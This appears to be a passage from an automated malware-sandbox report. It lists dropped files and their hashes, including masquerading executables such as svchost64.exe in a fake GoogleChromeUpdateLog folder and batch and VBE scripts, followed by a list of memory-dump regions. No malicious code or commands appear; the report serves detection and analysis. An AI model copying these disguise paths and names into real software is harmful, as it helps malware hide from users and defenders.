aba67c7e6c01856838b8bc6b0ba95e864e1fdcb3750aa7cdc1bc73511cea6fe4

SHA512
533900861fe36cf78b614d6a7ce741ff1172b41cbd5644b4a9542e6ca42702e6fbfb12f0fbaae8f5992320870a15e90b4f7bf180705fc9839db433413860be6d

Download Submit
C:\Users\Admin\AppData\Local\Temp\MCaZm091jB.bat

Filesize
208B

MD5
86340ed5f1f7d878ecc2a35f5365b4dc

SHA1
9e8aa04c11cc41db74677b4ead32cbeae7b8139b

SHA256
d1ad8cc31e50fb56e705b469c7c7a266cce4068027c7f5d6c5c9e468cb8bd2fb

SHA512
1dccb7cdafeb909b7fd9cb9abc721903c661fac50b3c688760ae753528128cfa93d5afd23e959bf14de7d0f3891af7026be8030e2a1fc28b12a0b1192806a998

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESE9CE.tmp

Filesize
1KB

MD5
9e0a0fa63ad8b65563e682dead15362a

SHA1
0fce987fa457c7f07f802e4e3075c843d182792e

SHA256
d9e528042bba39aee05e82412594b83776421dbb5a7ffe336ef2ef137d8b4c08

SHA512
d4d2958fb480614f5b08f3febecd4d42759114c49da97840748e8e9af18308624fdcf66f384b1b029aa1c2b7ac4a74a1302e16bca9f59545d07bfeac5b3e3e3d

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESEA7A.tmp

Filesize
1KB

MD5
2627f322be3cf522af85c09a6de263be

SHA1
3e6e2daef91f5f92ac29d38db3e3fe92b667df4a

SHA256
7f5755dd39871a6818911798e047d8151fac9b82aa62b2f45e437cda075c944e

SHA512
92c17d8ee0caea485de82fb2f949c9eef297ba874d9d402c9fde8aa40f7f798fb0f77aa88282467335393f3e1934eb1a3eb787eaa12b120dc525239d96a303e3

Download Submit
C:\Users\Admin\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe

Filesize
3.5MB

MD5
5fe249bbcc644c6f155d86e8b3cc1e12

SHA1
f5c550ab2576d2daeff9cb72a4d41d1bcfee0e6d

SHA256
9308b0ce7206c60517db7207c488b4fa1cc313413e5378d8bac63b22cabcdd80

SHA512
b210c6b5d8db31d8f4ea82a79fe4679ced289636570e3fd72a45c488fd2cd75ed74677d723c1bfa67432e46e71901cb6551595e1053448c2f5e297829a6e1b39

Download Submit
C:\Users\Admin\AppData\Local\Temp\msAgentSavesmonitor\oGgyulsi03j6EO3sjCC.bat

Filesize
103B

MD5
77218ae27e9ad896918d9a081c61b1be

SHA1
3c8ebaa8fa858b82e513ccf482e11172b0f52ce0

SHA256
e09540a47f3647a9fdf9673281e2664441bbaee8d3236d22b1875b9d23abacab

SHA512
6a16b367a762132172830fd81c41c58ac49de788eed93d4c5526f8f0e6859703b336a137fd8d4fe7088b4110d72e5f4767b6462bc4651769924b67305719f30a

Download Submit
C:\Users\Admin\AppData\Local\Temp\msAgentSavesmonitor\pFG3Duil1NAbFHoInFFIi7JfPHXMZXRvb98S0ewJA0VkW.vbe

Filesize
217B

MD5
d6da6166258e23c9170ee2a4ff73c725

SHA1
c3c9d6925553e266fe6f20387feee665ce3e4ba9

SHA256
78ee67a8ae359f697979f4cd3c7228d3235c32d3b611303e070b71414591ba1e

SHA512
37a5a18acbb56e5458baebb12a4d3b3229b218eb606be3535d1c30e8e0d4fa969543889c587078456321209fe4503688432f45ff35a7af598b770393e7ae3b05

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpAB44.tmp.bat

Filesize
256B

MD5
1bf8a01f4eb3a99f586c103c082d3d1c

SHA1
12800c8e80c3d29741ca59a4e116df31e534da4c

SHA256
1c82afe7a95e5ced829333389588696ec6c7232b02f511d4767a4666e449d884

SHA512
dd571b6017952f8c926a27b2be664793d1e19c82abfd061adb73df9136cbc50845511c1d6221a34c5526a7907070977ba3f1ea8c5a620e5fb42bb569e64b2773

Download Submit
C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\Update.exe

Filesize
5.6MB

MD5
3d3c49dd5d13a242b436e0a065cd6837

SHA1
e38a773ffa08452c449ca5a880d89cfad24b6f1b

SHA256
e0338c845a876d585eceb084311e84f3becd6fa6f0851567ba2c5f00eeaf4ecf

SHA512
dd0e590310392b0543d47a2d24d55f6f091ba59acc0d7ea533039ffb48f1b8938587889bcfa19b0538a62ba26fcde2172253860ceab34af40fd7bf65b6587b00

Download Submit
C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\svchost64.exe

Filesize
3.9MB

MD5
45c59202dce8ed255b4dbd8ba74c630f

SHA1
60872781ed51d9bc22a36943da5f7be42c304130

SHA256
d07c47f759245d34a5b94786637c3d2424c7e3f3dea3d738d95bf4721dbf3b16

SHA512
fff5b16ae38681ed56782c0f0423560dab45065685d7272424206f43c80486318180aa22d66bd197c8c530e4c24dbaaaa020beb76b619dc767ee59faa27e23ed

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ipyqrt3q\ipyqrt3q.0.cs

Filesize
394B

MD5
a9f2ac86a13454d1ae8c94a165ff54d9

SHA1
eaa185206d628f2dd2e83da21eae6b43d9cae632

SHA256
47644ce9a737cb9e70131dfaecf90b31458a93061b706359c3e50b2a3368e6f5

SHA512
77ef1200382932dd13dc3c760f5fd50d883ad8b980b7829025633e571d538fc908856bd937a9e236b06dc04e2d33c8023b6bc6ff47535d6c73e90c134da2c99b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ipyqrt3q\ipyqrt3q.cmdline

Filesize
268B

MD5
b45e44f75395df09e1570aaf52209eb1

SHA1
89a783fc85781f6768af99447cfe9aa04809b904

SHA256
e4a9202ab5f57f37c57dfca5e8814a0a20c9c1a00da1c4fc4526be21ce12521a

SHA512
d0718fabd702437cc0d02b9a95ab013383c1a83182ff825a8d4a667ca735dac17cbc501031aaaa69d5bec232816e464cdec98864f2adaba34ce73d5775076883

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\zjmdnnsy\zjmdnnsy.0.cs

Filesize
361B

MD5
0fbf326a04c88ffefb2c9e8dd5e530fc

SHA1
596459f1fa8e8f69a1fa9983a39f3e69b62717bf

SHA256
1859de2d5b50f8ac2a5c80e36a788b05551afaf112d393047fc7de99e88cd4f4

SHA512
3653172ca1fdb0bc4d946836402c89b6b6bcc45fde4230c9517dd2c012629b7e8d8d26beaf9bccb0d56cc8b3bc1673b8f95ed1d7eb62e85663a293fd321e1f10

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\zjmdnnsy\zjmdnnsy.cmdline

Filesize
235B

MD5
413dbe3ad2b87e78af0911ee3f396e66

SHA1
49baebd9d8f5cd0325a58faf4b752fb6d035b37a

SHA256
2682d1e104444c452f9a0735ab9b8604c32c8a9c9c5e346cd612ea33d80a3a62

SHA512
5b11f1a0614faf03429e71822c51782a550f0bbd55e12271236f71deab8b1aa642ac1461591565ea19befbb30ee891d3a0348ee9cadc903780028412634de2ab

Download Submit
\??\c:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\CSCEF000E877E57451AA5DB62FAA9D1E29.TMP

Filesize
1KB

MD5
bf38fe42913aaab3060562f036c56781

SHA1
2569e40a60e393e85be2c50cfa830c2e1430822c

SHA256
0e8f131ad2ed72fddaea0919a88aedfa09cfe5ae30f6fd675ab1fd7ece211cac

SHA512
42d67abd60177063dc22601c7b0c76aa53000d3196a2bb4c123d2992b907518850c767b2097e0663941ae6c292d95ef08569156e2a286e996662d541d6986f86

Download Submit
\??\c:\Windows\System32\CSC417EF92A53744646A18694A5662D75A.TMP

Filesize
1KB

MD5
acfb6faeec3eb6e047a5a2e7fc46f7c4

SHA1
bd7ca4bf6c574dec440c891d55a541a4cc20c376

SHA256
003e0aa24c6b8e2110a735f67fbd04e8669846591a5b4e21fe065ccc61fd92b8

SHA512
8084ffb6db54d21d869eb4f3d24f5081e0c177bffc703f1717e30b71dbf4898cccef8ef405d634556ef0370ecf67c1715151ae3d47277dea9cf612f73fc1e767

Download Submit
memory/428-91-0x000000001BF30000-0x000000001BF3E000-memory.dmp

Filesize
56KB

Download
memory/428-110-0x000000001C0C0000-0x000000001C11A000-memory.dmp

Filesize
360KB

Download
memory/428-162-0x000000001CE90000-0x000000001CF3F000-memory.dmp

Filesize
700KB

Download
memory/428-161-0x000000001CDB0000-0x000000001CE86000-memory.dmp

Filesize
856KB

Download
memory/428-120-0x000000001C190000-0x000000001C1DE000-memory.dmp

Filesize
312KB

Download
memory/428-118-0x000000001C120000-0x000000001C138000-memory.dmp

Filesize
96KB

Download
memory/428-116-0x000000001C080000-0x000000001C08E000-memory.dmp

Filesize
56KB

Download
memory/428-75-0x0000000000C90000-0x0000000001022000-memory.dmp

Filesize
3.6MB

Download
memory/428-77-0x000000001BF00000-0x000000001BF26000-memory.dmp

Filesize
152KB

Download
memory/428-79-0x00000000019C0000-0x00000000019CE000-memory.dmp

Filesize
56KB

Download
memory/428-81-0x00000000032A0000-0x00000000032BC000-memory.dmp

Filesize
112KB

Download
memory/428-83-0x00000000019D0000-0x00000000019E0000-memory.dmp

Filesize
64KB

Download
memory/428-85-0x000000001BF50000-0x000000001BF68000-memory.dmp

Filesize
96KB

Download
memory/428-87-0x00000000019E0000-0x00000000019F0000-memory.dmp

Filesize
64KB

Download
memory/428-89-0x000000001BDE0000-0x000000001BDF0000-memory.dmp

Filesize
64KB

Download
memory/428-114-0x000000001C070000-0x000000001C080000-memory.dmp

Filesize
64KB

Download
memory/428-93-0x000000001BF40000-0x000000001BF4E000-memory.dmp

Filesize
56KB

Download
memory/428-95-0x000000001BFF0000-0x000000001C002000-memory.dmp

Filesize
72KB

Download
memory/428-97-0x000000001BF70000-0x000000001BF80000-memory.dmp

Filesize
64KB

Download
memory/428-99-0x000000001C010000-0x000000001C026000-memory.dmp

Filesize
88KB

Download
memory/428-101-0x000000001C030000-0x000000001C042000-memory.dmp

Filesize
72KB

Download
memory/428-102-0x000000001C580000-0x000000001CAA8000-memory.dmp

Filesize
5.2MB

Download
memory/428-104-0x000000001BFD0000-0x000000001BFDE000-memory.dmp

Filesize
56KB

Download
memory/428-106-0x000000001BFE0000-0x000000001BFF0000-memory.dmp

Filesize
64KB

Download
memory/428-108-0x000000001C050000-0x000000001C060000-memory.dmp

Filesize
64KB

Download
memory/428-112-0x000000001C060000-0x000000001C06E000-memory.dmp

Filesize
56KB

Download
memory/556-192-0x000000001DC90000-0x000000001DC99000-memory.dmp

Filesize
36KB

Download
memory/556-191-0x000000001E200000-0x000000001E246000-memory.dmp

Filesize
280KB

Download
memory/556-189-0x000000001D080000-0x000000001D156000-memory.dmp

Filesize
856KB

Download
memory/556-195-0x000000001E270000-0x000000001E27B000-memory.dmp

Filesize
44KB

Download
memory/556-190-0x000000001CAA0000-0x000000001CB4F000-memory.dmp

Filesize
700KB

Download
memory/556-194-0x000000001E250000-0x000000001E26E000-memory.dmp

Filesize
120KB

Download
memory/556-193-0x000000001DDF0000-0x000000001DDFD000-memory.dmp

Filesize
52KB

Download
memory/3148-28-0x000001F2A7020000-0x000001F2A7042000-memory.dmp

Filesize
136KB

Download
memory/3148-20-0x000001F2A5F40000-0x000001F2A5F4A000-memory.dmp

Filesize
40KB

Download
memory/3148-21-0x000001F2A61C0000-0x000001F2A622A000-memory.dmp

Filesize
424KB

Download
memory/3148-48-0x000001F2A6F80000-0x000001F2A6F92000-memory.dmp

Filesize
72KB

Download
memory/3148-24-0x000001F2A6E90000-0x000001F2A6ECA000-memory.dmp

Filesize
232KB

Download
memory/3148-25-0x000001F2A5F10000-0x000001F2A5F36000-memory.dmp

Filesize
152KB

Download
memory/3148-29-0x000001F2A7050000-0x000001F2A737E000-memory.dmp

Filesize
3.2MB

Download
memory/3148-55-0x000001F2A7720000-0x000001F2A77CA000-memory.dmp

Filesize
680KB

Download
memory/3148-27-0x000001F2A6FD0000-0x000001F2A7020000-memory.dmp

Filesize
320KB

Download
memory/3148-26-0x000001F2A6ED0000-0x000001F2A6F82000-memory.dmp

Filesize
712KB

Download
memory/3464-8-0x0000024B34890000-0x0000024B348AE000-memory.dmp

Filesize
120KB

Download
memory/3464-1-0x0000024B19E80000-0x0000024B1A420000-memory.dmp

Filesize
5.6MB

Download
memory/3464-6-0x0000024B34980000-0x0000024B349F6000-memory.dmp

Filesize
472KB

Download
memory/3464-7-0x00007FF883110000-0x00007FF883BD2000-memory.dmp

Filesize
10.8MB

Download
memory/3464-13-0x00007FF883110000-0x00007FF883BD2000-memory.dmp

Filesize
10.8MB

Download
memory/3464-0-0x00007FF883113000-0x00007FF883115000-memory.dmp

Filesize
8KB

Download